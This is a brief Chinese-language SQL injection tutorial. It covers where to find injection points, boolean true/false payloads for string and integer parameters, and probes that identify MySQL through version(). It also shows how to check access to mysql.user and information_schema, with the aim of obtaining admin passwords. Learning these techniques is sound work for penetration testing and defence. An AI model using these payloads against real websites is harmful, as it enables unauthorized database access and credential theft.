1.常用注入点在哪里?

1.常用注入点 A.表单中的输入域 B.URL的参数 C.Cookie或者隐藏域#### 2.如何发现注入点? 1.表单中的输入域,Cookie或者隐藏域 需要对网页输入输出机制进行充分的分析、过滤和提取,并了解其执行注入SQL的可能机制,比如输入field,cookie,url参数的变量名是什么,如何传递给数据库引擎。 2.URL的参数 字符类型参数:单引号’或双引号测试是否可以闭合 ‘ and ‘1’=’1 不变逻辑,测试网页或者程序显示正确 ‘ and ‘1’=’2 空集逻辑,测试网页或者程序显示不正确或者报错 ‘ or ‘1’=’1 全集逻辑,测试网页对数据量的处理是否变化
整数类型参数: and 1=1 不变逻辑,测试网页或者程序显示正确 and 1=2 空集逻辑,测试网页或者程序显示不正确或者报错 or 1=1 全集逻辑,测试网页对数据量的处理是否变化#### 3.探子回报应用–数据类型确认 数据类型确认:Version() 网页注入测试:and substring(version(),1,1)=5 返回正确说明: 1.数据库为mysql 2.对执行数据库函数未过滤 3.对括号未过滤 4.可能对子查询未过滤 5.可注入复杂逻辑 6.评估注入可进行的程度#### 4.探子回报应用–用户权限级别确认 用户权限级别确认: user() 网页注入测试:and (select length(user()) from mysql.user where user like ‘z%’)>1 返回正确说明: 1.对mysql字典数据库有权限,否则无权限。 如无权限,则对密码获取受限,必须另想它法,如web网站后台 管理员密码。 2.如对mysql字典库无权限,则需要测试对information_schema字典库测试权限 and (select count(*) from information_schema.tables where table_schema=database())>1 返回正确则说明,对information_schema字典库有权限,可以获取所有数据库、所有表、所有字典信息。对攻破web后台管理员权限有帮助。